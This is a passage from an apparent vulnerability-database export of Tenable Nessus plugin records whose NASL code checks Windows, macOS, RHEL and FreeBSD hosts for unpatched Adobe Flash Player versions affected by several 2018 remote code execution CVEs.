script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_activex_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-03\";\nkbs = make_list('4088785');\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, \"activex_init\");\n\n# Adobe Flash Player CLSID\nclsid = '{D27CDB6E-AE6D-11cf-96B8-444553540000}';\n\nfile = activex_get_filename(clsid:clsid);\nif (isnull(file))\n{\n activex_end();\n audit(AUDIT_FN_FAIL, \"activex_get_filename\", \"NULL\");\n}\nif (!file)\n{\n activex_end();\n audit(AUDIT_ACTIVEX_NOT_FOUND, clsid);\n}\n\n# Get its version.\nversion = activex_get_fileversion(clsid:clsid);\nif (!version)\n{\n activex_end();\n audit(AUDIT_VER_FAIL, file);\n}\n\ninfo = '';\n\niver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\niver = join(iver, sep:\".\");\n\n# all <= 28.0.0.161\nfix = FALSE;\nif(ver_compare(ver:iver, fix:\"28.0.0.161\", strict:FALSE) <= 0)\n fix = \"29.0.0.113\";\n\nif (\n (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0) &&\n fix\n)\n{\n info = '\\n Path : ' + file +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n}\n\nport = kb_smb_transport();\n\nif (info != '')\n{\n if (report_paranoia > 1)\n {\n report = info +\n '\\n' +\n 'Note, though, that Nessus did not check whether the kill bit was\\n' +\n \"set for the control's CLSID because of the Report Paranoia setting\" + '\\n' +\n 'in effect when this scan was run.\\n';\n }\n else\n {\n report = info +\n '\\n' +\n 'Moreover, its kill bit is not set so it is accessible via Internet\\n' +\n 'Explorer.\\n';\n }\n replace_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_add_report(bulletin:'MS18-03', kb:'4088785', report);\n security_report_v4(severity:SECURITY_HOLE, port:port, extra:hotfix_get_report());\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T05:42:34", "description": "An update for flash-plugin is now available for Red Hat Enterprise\nLinux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Critical. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update upgrades Flash Player to version 29.0.0.113.\n\nSecurity Fix(es) :\n\n* flash-plugin: Use After Free - remote code execution vulnerability\n(APSB18-05) (CVE-2018-4919)\n\n* flash-plugin: Type Confusion - remote code execution vulnerability\n(APSB18-05) (CVE-2018-4920)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.", "edition": 27, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-15T00:00:00", "title": "RHEL 6 : flash-plugin (RHSA-2018:0520)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4920", "CVE-2018-4919"], "modified": "2021-03-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:flash-plugin", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2018-0520.NASL", "href": "https://www.tenable.com/plugins/nessus/108361", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:0520. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108361);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/10/24 15:35:44\");\n\n script_cve_id(\"CVE-2018-4919\", \"CVE-2018-4920\");\n script_xref(name:\"RHSA\", value:\"2018:0520\");\n\n script_name(english:\"RHEL 6 : flash-plugin (RHSA-2018:0520)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for flash-plugin is now available for Red Hat Enterprise\nLinux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Critical. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update upgrades Flash Player to version 29.0.0.113.\n\nSecurity Fix(es) :\n\n* flash-plugin: Use After Free - remote code execution vulnerability\n(APSB18-05) (CVE-2018-4919)\n\n* flash-plugin: Type Confusion - remote code execution vulnerability\n(APSB18-05) (CVE-2018-4920)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-05.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2018:0520\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-4919\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-4920\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:0520\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"flash-plugin-29.0.0.113-1.el6_9\")) flag++;\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T02:46:31", "description": "The version of Adobe Flash Player installed on the remote Windows host\nis equal or prior to version 28.0.0.137. It is, therefore, affected by\na use-after-free vulnerability that allows arbitrary code execution.", "edition": 30, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-02-05T00:00:00", "title": "Adobe Flash Player <= 28.0.0.137 Use-after-free Remote Code Execution (APSA18-01) (APSB18-03)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4878", "CVE-2018-4877"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "FLASH_PLAYER_APSA18-01.NASL", "href": "https://www.tenable.com/plugins/nessus/106606", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106606);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\"CVE-2018-4877\", \"CVE-2018-4878\");\n script_bugtraq_id(102893, 102930);\n\n script_name(english:\"Adobe Flash Player <= 28.0.0.137 Use-after-free Remote Code Execution (APSA18-01) (APSB18-03)\");\n script_summary(english:\"Checks the version of Flash Player.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote Windows host\nis equal or prior to version 28.0.0.137. It is, therefore, affected by\na use-after-free vulnerability that allows arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa18-01.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-03.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 28.0.0.161 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4877\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Flash_Player/installed\");\n\n# Identify vulnerable versions.\ninfo = \"\";\nvariants = make_list(\n \"Plugin\",\n \"ActiveX\",\n \"Chrome\",\n \"Chrome_Pepper\"\n);\n\ncutoff_version = \"28.0.0.137\";\nfix = \"28.0.0.161\";\n\n# we're checking for versions less than *or equal to* the cutoff!\nforeach variant (variants)\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n\n if (isnull(vers) || isnull(files))\n continue;\n\n foreach key (keys(vers))\n {\n ver = vers[key];\n if (isnull(ver))\n continue;\n\n # vuln <= 28.0.0.137\n if (ver_compare(ver:ver, fix:cutoff_version, strict:FALSE) <= 0)\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product : Browser plugin (for Firefox / Netscape / Opera)';\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n }\n else if (\"Chrome\" >< variant)\n {\n info += '\\n Product : Browser plugin (for Google Chrome)';\n if (variant == \"Chrome\")\n fix = \"Upgrade to a version of Google Chrome running Flash Player 28.0.0.161\";\n }\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver;\n if (variant == \"Chrome_Pepper\")\n info += '\\n Fixed version : '+fix+' (Chrome PepperFlash)';\n else if (!isnull(fix))\n info += '\\n Fixed version : '+fix;\n info += '\\n';\n }\n }\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0) security_hole(port:port, extra:info);\n else security_hole(port);\n}\nelse\n{\n if (thorough_tests)\n exit(0, 'No vulnerable versions of Adobe Flash Player were found.');\n else\n exit(1, 'Google Chrome\\'s built-in Flash Player may not have been detected because the \\'Perform thorough tests\\' setting was not enabled.');\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T03:47:54", "description": "The version of Adobe Flash Player installed on the remote macOS or Mac\nOS X host is equal or prior to version 28.0.0.137. It is,\ntherefore, affected by a remote code execution vulnerability.", "edition": 30, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-02-05T00:00:00", "title": "Adobe Flash Player for Mac <= 28.0.0.137 Use-after-free Remote Code Execution (APSA18-01) (APSB18-03)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4878", "CVE-2018-4877"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "MACOSX_FLASH_PLAYER_APSA18-01.NASL", "href": "https://www.tenable.com/plugins/nessus/106607", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106607);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\"CVE-2018-4877\", \"CVE-2018-4878\");\n script_bugtraq_id(102893, 102930);\n\n script_name(english:\"Adobe Flash Player for Mac <= 28.0.0.137 Use-after-free Remote Code Execution (APSA18-01) (APSB18-03)\");\n script_summary(english:\"Checks the version of Flash Player.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote macOS or Mac OSX host has a browser plugin installed that is\naffected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote macOS or Mac\nOS X host is equal or prior to version 28.0.0.137. It is,\ntherefore, affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa18-01.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-03.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 28.0.0.161 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4877\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_flash_player_installed.nasl\");\n script_require_keys(\"MacOSX/Flash_Player/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Flash_Player/Version\");\npath = get_kb_item_or_exit(\"MacOSX/Flash_Player/Path\");\n\ncutoff_version = \"28.0.0.137\";\nfix = \"28.0.0.161\";\n# We're checking for versions less than or equal to the cutoff!\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(severity:SECURITY_HOLE, port:0, extra:report);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Flash Player for Mac\", version, path);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T05:42:19", "description": "An update for flash-plugin is now available for Red Hat Enterprise\nLinux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Critical. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update upgrades Flash Player to version 28.0.0.161.\n\nSecurity Fix(es) :\n\n* This update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities, detailed in the Adobe Security Bulletin listed\nin the References section, could allow an attacker to create a\nspecially crafted SWF file that would cause flash-plugin to crash,\nexecute arbitrary code, or disclose sensitive information when the\nvictim loaded a page containing the malicious SWF content.\n(CVE-2018-4877, CVE-2018-4878)", "edition": 32, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-02-08T00:00:00", "title": "RHEL 6 : flash-plugin (RHSA-2018:0285) (Underminer)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4878", "CVE-2018-4877"], "modified": "2021-03-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:flash-plugin", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2018-0285.NASL", "href": "https://www.tenable.com/plugins/nessus/106671", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:0285. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106671);\n script_version(\"3.14\");\n script_cvs_date(\"Date: 2019/10/24 15:35:44\");\n\n script_cve_id(\"CVE-2018-4877\", \"CVE-2018-4878\");\n script_xref(name:\"RHSA\", value:\"2018:0285\");\n\n script_name(english:\"RHEL 6 : flash-plugin (RHSA-2018:0285) (Underminer)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for flash-plugin is now available for Red Hat Enterprise\nLinux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Critical. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update upgrades Flash Player to version 28.0.0.161.\n\nSecurity Fix(es) :\n\n* This update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities, detailed in the Adobe Security Bulletin listed\nin the References section, could allow an attacker to create a\nspecially crafted SWF file that would cause flash-plugin to crash,\nexecute arbitrary code, or disclose sensitive information when the\nvictim loaded a page containing the malicious SWF content.\n(CVE-2018-4877, CVE-2018-4878)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-03.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2018:0285\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-4877\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-4878\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/08\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:0285\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"flash-plugin-28.0.0.161-1.el6_9\")) flag++;\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T02:54:38", "description": "Adobe reports :\n\n- This update resolves use-after-free vulnerabilities that could lead\nto remote code execution (CVE-2018-4877, CVE-2018-4878).", "edition": 29, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-02-07T00:00:00", "title": "FreeBSD : Flash Player -- multiple vulnerabilities (756a8631-0b84-11e8-a986-6451062f0f7a) (Underminer)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4878", "CVE-2018-4877"], "modified": "2021-03-02T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:linux-flashplayer", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_756A86310B8411E8A9866451062F0F7A.NASL", "href": "https://www.tenable.com/plugins/nessus/106649", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must 